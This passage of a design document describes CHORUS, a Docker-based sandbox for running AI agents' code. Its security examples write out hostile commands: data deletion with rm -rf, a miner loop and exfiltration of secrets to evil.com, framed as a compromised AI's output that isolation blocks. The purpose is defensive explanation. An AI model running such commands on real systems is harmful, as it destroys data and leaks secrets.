Execute commands via SSH session │ └─────────────────────────────────────────────────────────────┘ Problems: ❌ Extra attack surface (sshd vulnerabilities) ❌ Key management complexity ❌ Authentication overhead ❌ Extra memory (sshd process) ❌ Port management (need unique ports) ❌ Terminal emulation complexity ❌ Less portable (SSH not always available) Example: # Dockerfile additions needed RUN apt-get install -y openssh-server && \ mkdir /var/run/sshd && \ echo 'chorus:password' | chpasswd CMD ["/usr/sbin/sshd", "-D"] # Code complexity conn, err := ssh.Dial("tcp", fmt.Sprintf("localhost:%d", containerPort), sshConfig) session, err := conn.NewSession() output, err := session.CombinedOutput("cargo build") ``` ### Alternative 2: New Container Per Command ``` ┌─────────────────────────────────────────────────────────────┐ │ How it would work: │ │ 1. Create container for command │ │ 2. Run: docker run --rm image cargo build │ │ 3. Wait for completion │ │ 4. Container auto-removes │ │ 5. Repeat for next command │ └─────────────────────────────────────────────────────────────┘ Problems: ❌ Slow (2-5s startup per command) ❌ No state persistence between commands ❌ Can't cd between commands ❌ Can't set environment variables ❌ Wasteful (recreate same environment) ❌ Higher resource churn Example: // Command 1 docker run --rm chorus-rust-dev cargo build // 2-5 second startup, builds in /workspace // Command 2 docker run --rm chorus-rust-dev cargo test // PROBLEM: Previous build artifacts gone! // Must rebuild everything again ``` ### Alternative 3: Direct Host Execution ``` ┌─────────────────────────────────────────────────────────────┐ │ How it would work: │ │ 1. Run commands directly on host OS │ │ 2. 
No containers, no isolation │
└─────────────────────────────────────────────────────────────┘

Problems:
❌ EXTREMELY DANGEROUS (AI has full system access)
❌ Unpredictable (depends on host OS)
❌ "Works on my machine" syndrome
❌ No resource limits
❌ No cleanup (files left behind)
❌ Dependency conflicts
❌ Security nightmare

Example:
// If the AI is compromised or makes a mistake:
exec.Command("rm", "-rf", "/").Run()
// 💀 Your entire system is gone
```

### Why Docker Exec is Optimal

```
┌───────────────────────────────────────────────────────────────┐
│ ✅ CHORUS Approach Wins                                       │
├───────────────────────────────────────────────────────────────┤
│ Security          │ ⭐⭐⭐⭐⭐ Full isolation, multiple layers│
│ Performance       │ ⭐⭐⭐⭐⭐ Fast after warmup (10ms/cmd)   │
│ Simplicity        │ ⭐⭐⭐⭐⭐ Zero config, no auth needed    │
│ State Persistence │ ⭐⭐⭐⭐⭐ Files persist between commands │
│ Reproducibility   │ ⭐⭐⭐⭐⭐ Same env every time            │
│ Resource Control  │ ⭐⭐⭐⭐⭐ CPU, memory, disk limits       │
│ API Quality       │ ⭐⭐⭐⭐⭐ Official Go SDK, well-tested   │
│ Portability       │ ⭐⭐⭐⭐⭐ Works anywhere Docker runs     │
└───────────────────────────────────────────────────────────────┘
```

---

## Available Development Environments

All images are publicly available on Docker Hub: `docker.io/anthonyrawlins/chorus-*`

### Image Catalog

| Image | Base Size | Tools Included | Use Cases |
|-------|-----------|----------------|-----------|
| **chorus-base** | 643MB | git, curl, wget, vim, jq, build-essential, netcat, zip/tar | Shell scripts, generic tasks, text processing |
| **chorus-rust-dev** | 2.42GB | rustc 1.77+, cargo, clippy, rustfmt, rust-analyzer, ripgrep, fd-find, bat | Rust compilation, cargo builds, clippy linting, formatting |
| **chorus-go-dev** | 1GB | go1.22, gopls, delve, staticcheck, golangci-lint | Go builds, go mod operations, testing, linting |
| **chorus-python-dev** | 1.07GB | python3.11, uv, pip-tools, ruff, black, mypy, pytest, pylint, ipython | Python scripts, pip installs, testing, type checking |
| **chorus-node-dev** | 982MB | node20, npm, pnpm, yarn, typescript, ts-node, eslint, prettier, nodemon | npm builds, TypeScript compilation, testing, linting |
| **chorus-java-dev** | 1.3GB | openjdk-17, maven, gradle | Maven/Gradle builds, Java compilation, JUnit testing |
| **chorus-cpp-dev** | 1.63GB | gcc, g++, clang, cmake, ninja, gdb, valgrind, doxygen | C/C++ compilation, CMake builds, debugging, profiling |

### Workspace Structure (Standardized Across All Images)

```
/workspace/
├── input/        Read-only source code, task inputs
│   ├── src/
│   ├── README.md
│   └── Cargo.toml
│
├── data/         Working directory for builds and temporary files
│   ├── target/          (Rust build artifacts)
│   ├── node_modules/    (Node dependencies)
│   └── .cache/          (Various caches)
│
└── output/       Final deliverables and artifacts
    ├── myapp            (compiled binary)
    ├── test-results.xml
    └── coverage.html
```

### Environment Variables (All Images)

```bash
WORKSPACE_ROOT=/workspace
WORKSPACE_INPUT=/workspace/input
WORKSPACE_DATA=/workspace/data
WORKSPACE_OUTPUT=/workspace/output
```

### Example: Using Each Image

**Rust Development:**

```bash
# Sources are mounted read-only, so build output goes to /workspace/data
docker run --rm -v "$(pwd)":/workspace/input:ro \
  anthonyrawlins/chorus-rust-dev:latest \
  bash -c "cd /workspace/input && cargo build --release --target-dir /workspace/data/target"
```

**Python Script:**

```bash
docker run --rm -v "$(pwd)":/workspace/input:ro \
  anthonyrawlins/chorus-python-dev:latest \
  bash -c "cd /workspace/input && python3 main.py"
```

**Node.js Application:**

```bash
# npm writes node_modules next to package.json, so copy the read-only sources first
docker run --rm -v "$(pwd)":/workspace/input:ro \
  anthonyrawlins/chorus-node-dev:latest \
  bash -c "cp -r /workspace/input/. /workspace/data/ && cd /workspace/data && npm install && npm test"
```

### Language Detection Algorithm

```go
// Priority 1: Explicit (highest confidence)
{
  "context": {
    "language": "rust" // ← Directly specified
  }
}
// Result: chorus-rust-dev

// Priority 2: Repository URL patterns
{
  "context": {
    "repository_url": "github.com/user/my-rust-app" // ← "rust" in name
  }
}
// Result: chorus-rust-dev

// Priority 3: Description keywords
{
  "description": "Fix compilation error in Cargo.toml"
  // ← "Cargo.toml" detected
}
// Result: chorus-rust-dev (high-priority keyword match)

// Priority 4: Generic mentions
{
  "description": "Update the rust version" // ← Generic "rust" mention
}
// Result: chorus-rust-dev (medium-priority match)

// Fallback
{
  "description": "Process this JSON file" // ← No language detected
}
// Result: chorus-base (fallback)
```

### AI Model Awareness (New in v2.0)

AI models now receive image information in their system prompt via **Rule E: Execution Environments**:

```markdown
Available Images (Docker Hub: anthonyrawlins/chorus-*):

| Language/Stack | Image | Pre-installed Tools | Use When |
|----------------|-------|---------------------|----------|
| **Rust** | chorus-rust-dev | rustc, cargo, clippy | Rust compilation... |
```

This allows the AI to:
- Recommend appropriate environments
- Explicitly set `context.language` in responses
- Explain tool availability to users
- Plan multi-step execution with correct images

---

## Real-World Examples

### Example 1: Fix Rust Compilation Error

**User Request:**

```json
{
  "task_id": "FIX-001",
  "description": "Fix the compilation error in src/main.rs",
  "context": {
    "repository_url": "https://github.com/user/my-rust-app",
    "language": "rust"
  }
}
```

**Execution Flow:**

```
1. Language Detection
   ├─ Explicit: context.language = "rust" ✅
   ├─ Repository: "rust-app" detected ✅
   └─ Selected: anthonyrawlins/chorus-rust-dev:latest

2. Sandbox Initialization (850ms)
   ├─ Pull image (0ms - cached)
   ├─ Create container (300ms)
   ├─ Start container (150ms)
   └─ Configure workspace (400ms)

3. AI Analysis (5s)
   ├─ Read src/main.rs
   ├─ Identify error: "unused variable `x`"
   └─ Generate fix

4. Apply Fix (50ms)
   ├─ WriteFile(src/main.rs, fixed_content)
   └─ Verify with syntax check

5. Compile & Test (45s)
   ├─ Command: cargo build --release
   ├─ stdout: "Compiling myapp v0.1.0..."
   ├─ Command: cargo test
   └─ Exit code: 0 ✅

6. Collect Artifacts (200ms)
   ├─ Binary: target/release/myapp (4.2MB)
   ├─ Test report: target/test-results.xml
   └─ Coverage: target/coverage.html

7. Cleanup (150ms)
   ├─ Stop container
   └─ Remove container

Total Time: 51.25 seconds
Result: Success ✅
```

**Resource Usage:**

```
CPU:       1.8 cores average (90% of 2-core limit)
Memory:    1.6GB peak (80% of 2GB limit)
Disk I/O:  450MB read, 180MB written
Network:   0 bytes (isolated)
Processes: 12 peak (12% of 100 limit)
```

### Example 2: Python Data Analysis

**User Request:**

```json
{
  "task_id": "ANALYZE-001",
  "description": "Run pytest on the data analysis pipeline",
  "context": {
    "repository_url": "https://github.com/user/data-pipeline"
  }
}
```

**Execution Flow:**

```
1. Language Detection
   ├─ Repository: "data-pipeline" (no lang hint)
   ├─ Description: "pytest" detected ✅
   └─ Selected: anthonyrawlins/chorus-python-dev:latest

2. Setup Dependencies (15s)
   ├─ Command: uv sync
   ├─ Installs: pandas, numpy, pytest, pytest-cov
   └─ Cache: /workspace/data/.cache/uv/

3. Run Tests (8s)
   ├─ Command: uv run pytest --cov=src --cov-report=html --cov-report=xml
   ├─ stdout: "test_pipeline.py::test_transform PASSED"
   ├─ stdout: "test_pipeline.py::test_analyze PASSED"
   ├─ Coverage: 94%
   └─ Exit code: 0 ✅

4. Artifacts
   ├─ HTML report: htmlcov/index.html
   ├─ XML report: coverage.xml
   └─ Pytest cache: .pytest_cache/

Total Time: 24.8 seconds
Result: Success ✅ (94% coverage)
```

### Example 3: Multi-Language Monorepo

**User Request:**

```json
{
  "task_id": "BUILD-001",
  "description": "Build the frontend and backend",
  "context": {
    "repository_url": "https://github.com/user/fullstack-app"
  }
}
```

**Execution Flow (Sequential):**

```
Task 1: Build Backend (Go)
─────────────────────────────
1. Detect: "go.mod" found → go-dev
2. Sandbox: chorus-go-dev container
3. Commands:
   ├─ go mod download
   ├─ go build -o backend ./cmd/server
   └─ go test ./...
4. Result: backend binary (12MB)
5. Cleanup & save artifacts

Task 2: Build Frontend (Node.js)
─────────────────────────────────
1. Detect: "package.json" found → node-dev
2. Sandbox: chorus-node-dev container
3. Commands:
   ├─ npm install
   ├─ npm run build
   └─ npm test
4. Result: dist/ folder (8MB)
5. Cleanup & save artifacts

Combined Artifacts:
├─ backend (12MB)
└─ frontend/dist/ (8MB)

Total Time: 89 seconds sequential (52s if the two tasks run in parallel)
Result: Success ✅
```

### Example 4: Security Scenario - Malicious Code Blocked

**Malicious Request (AI compromised or buggy):**

```json
{
  "task_id": "EVIL-001",
  "description": "Clean up old files",
  "context": {}
}
```

**AI Generates Malicious Code:**

```python
# Attempt 1: Delete host files
import os
os.system("rm -rf /host/important_data")

# Attempt 2: Cryptocurrency miner
while True:
    compute_hash()  # Infinite CPU loop

# Attempt 3: Exfiltrate data
import requests
requests.post("http://evil.com", data=secrets)
```

**What Actually Happens:**

```
Attempt 1: Delete Host Files
─────────────────────────────
Command: rm -rf /host/important_data
Result:  ❌ Nothing to delete (path not found)
Reason:  Mount namespace isolation
         /host doesn't exist in container
         Even if it did, read-only root FS prevents deletion

Attempt 2: CPU Mining
─────────────────────
Command: python3 mine.py
Result:  ⚠️ Runs but limited
Reason:  CPU limit = 2 cores (can't consume all host CPU)
         Timeout = 5 minutes (killed automatically)
         Host system remains responsive

Attempt 3: Network Exfiltration
────────────────────────────────
Command: python3 -c "import requests; requests.post(...)"
Result:  ❌ Network unreachable
Reason:  NetworkMode = "none"
         No network interfaces available
         Can't resolve DNS or create connections

Final Outcome:
✅ Host system completely safe
✅ Container killed after timeout
✅ All attempts logged for audit
✅ No persistent damage
```

---

## Troubleshooting & FAQ

### Common Issues

**1. "Image not found" Error**

```bash
Error: Failed to pull image: manifest unknown
```

**Solution:**

```bash
# Verify image name
docker pull anthonyrawlins/chorus-rust-dev:latest

# Check Docker Hub manually
# https://hub.docker.com/r/anthonyrawlins/chorus-rust-dev

# If still failing, check internet connection
ping hub.docker.com
```

**2. Container Startup Timeout**

```bash
Error: Context deadline exceeded while starting container
```

**Solution:**

```bash
# Check Docker daemon status
systemctl status docker

# Check system resources
docker system df
df -h

# Clean up old containers/images
# (note: -a removes ALL unused images, including pre-pulled chorus-* images)
docker system prune -a

# Increase timeout in config (Go setting, not a shell command):
#   timeout: 10 * time.Minute  // Default: 5 minutes
```

**3. Out of Memory Errors**

```bash
Error: Container killed by OOM killer
```

**Solution:**

```go
// Increase memory limit in SandboxConfig
Resources: ResourceLimits{
    MemoryLimit: 4 * 1024 * 1024 * 1024, // 4GB instead of 2GB
},
```

**4. Permission Denied Writing Files**

```bash
Error: Permission denied: /workspace/output/myapp
```

**Solution:**

```bash
# Container runs as UID 1000 (user: chorus)
# Ensure host directories have correct permissions

# On host:
sudo chown -R 1000:1000 /path/to/workspace/output

# Or make world-writable (less secure):
chmod 777 /path/to/workspace/output
```

### FAQ

**Q: Can the AI access my files?**

A: No. The container has its own isolated filesystem. You explicitly choose which files to mount via `Repository.LocalPath`, and even those are mounted read-only by default.

**Q: What if the AI generates malicious code?**

A: The security layers prevent damage:
- No network access (can't exfiltrate data)
- No host file access (can't modify your system)
- Resource limits (can't DoS your machine)
- Read-only root (can't install malware)
- Non-root user (can't escalate privileges)

**Q: How much disk space do the images use?**

A: About 9GB if you add up the seven image sizes listed in the catalog. Actual disk usage is lower thanks to layer sharing:
- Base layers are shared across images
- Only language-specific layers are unique
- Example: rust-dev = 643MB base + 1.8GB Rust tools

**Q: Can I use custom images?**

A: Yes! Specify in `SandboxConfig`:

```go
config := &SandboxConfig{
    Image: "mycompany/custom-rust:latest",
}
```

**Q: What happens if a command hangs forever?**

A: Automatic timeout:
- Default: 5 minutes per command
- Configurable via `Command.Timeout`
- Container is forcibly stopped after timeout
- Resources are cleaned up automatically

**Q: Can containers communicate with each other?**

A: Not by default (`NetworkMode: "none"`). If needed for multi-service testing, you can configure a custom Docker network, but this should be used cautiously.

**Q: How do I debug issues inside the container?**

A: Several options:

```go
// 1. Keep container alive for manual inspection
config.CleanupDelay = 10 * time.Minute

// 2. Execute debug commands
sandbox.ExecuteCommand(ctx, &Command{
    Executable: "ls",
    Args:       []string{"-la", "/workspace/data"},
})

// 3. Read log files (check the error instead of discarding it)
logContent, err := sandbox.ReadFile(ctx, "/workspace/data/build.log")
if err != nil {
    log.Printf("could not read build log: %v", err)
}
```

**Q: Performance: Should I pre-pull images?**

A: Highly recommended for production:

```bash
# On each cluster node
docker pull anthonyrawlins/chorus-rust-dev:latest
docker pull anthonyrawlins/chorus-go-dev:latest
docker pull anthonyrawlins/chorus-python-dev:latest
docker pull anthonyrawlins/chorus-node-dev:latest
docker pull anthonyrawlins/chorus-java-dev:latest
docker pull anthonyrawlins/chorus-cpp-dev:latest
docker pull anthonyrawlins/chorus-base:latest
```

This eliminates 30-120s pull time on first use.

**Q: Can I run multiple tasks in parallel?**

A: Yes! Each task gets its own isolated container:

```go
// Safe to run concurrently; wait for all tasks before moving on
var wg sync.WaitGroup
wg.Add(3)
go func() { defer wg.Done(); engine.ExecuteTask(ctx, rustTask) }()
go func() { defer wg.Done(); engine.ExecuteTask(ctx, pythonTask) }()
go func() { defer wg.Done(); engine.ExecuteTask(ctx, nodeTask) }()
wg.Wait()
```

**Q: What's the overhead compared to native execution?**

A: Minimal after warmup:
- First command: +400-850ms (container startup)
- Subsequent commands: +10-15ms per command
- Memory: +150MB overhead
- CPU: +5% overhead

For long-running builds (minutes), overhead is negligible.

**Q: How do I update tool versions in images?**

A: Images are versioned and immutable. To update:
1. Build new image version (e.g., `chorus-rust-dev:1.1.0`)
2. Push to Docker Hub
3. Update `ImageVersion` constant in `images.go`
4. Old versions remain available for reproducibility

---

## Summary: Why This Approach is Revolutionary

### The Promise

CHORUS Task Execution Engine delivers on a critical promise: **AI agents can write, build, test, and execute code safely at scale.**

### Key Innovations

1. **Zero Configuration Security**
   - No SSH keys, no passwords, no firewall rules
   - Security by default, not as an afterthought

2. **Multi-Language Support Out-of-the-Box**
   - 7 pre-configured environments
   - Automatic detection and selection
   - Consistent workspace structure

3. **API-First Design**
   - Direct Docker SDK communication
   - No subprocess spawning
   - Structured error handling

4. **Resource Predictability**
   - Guaranteed CPU, memory, disk limits
   - No "noisy neighbor" problems
   - Fair scheduling across tasks

5. **Auditability**
   - Every command logged
   - Complete resource tracking
   - Reproducible execution history

### The Bottom Line

Traditional approaches force you to choose between:
- **Security** (complex SSH, VMs, permission systems)
- **Performance** (native execution, no isolation)
- **Simplicity** (manual tool installation, dependency hell)

**CHORUS gives you all three.**

---

## References

- **Source Code**: `/home/tony/chorus/project-queues/active/CHORUS/pkg/execution/`
- **Docker SDK**: https://pkg.go.dev/github.com/docker/docker
- **Image Repository**: https://gitea.chorus.services/tony/chorus-dev-images
- **Docker Hub**: https://hub.docker.com/r/anthonyrawlins/
- **Security References**:
  - Linux Namespaces: https://man7.org/linux/man-pages/man7/namespaces.7.html
  - Seccomp: https://docs.docker.com/engine/security/seccomp/
  - AppArmor: https://docs.docker.com/engine/security/apparmor/

---

**Document Version**: 1.0

**Last Updated**: 2025-09-30

**Author**: CHORUS Development Team

**Maintained By**: Tony Rawlins (tony@chorus.services)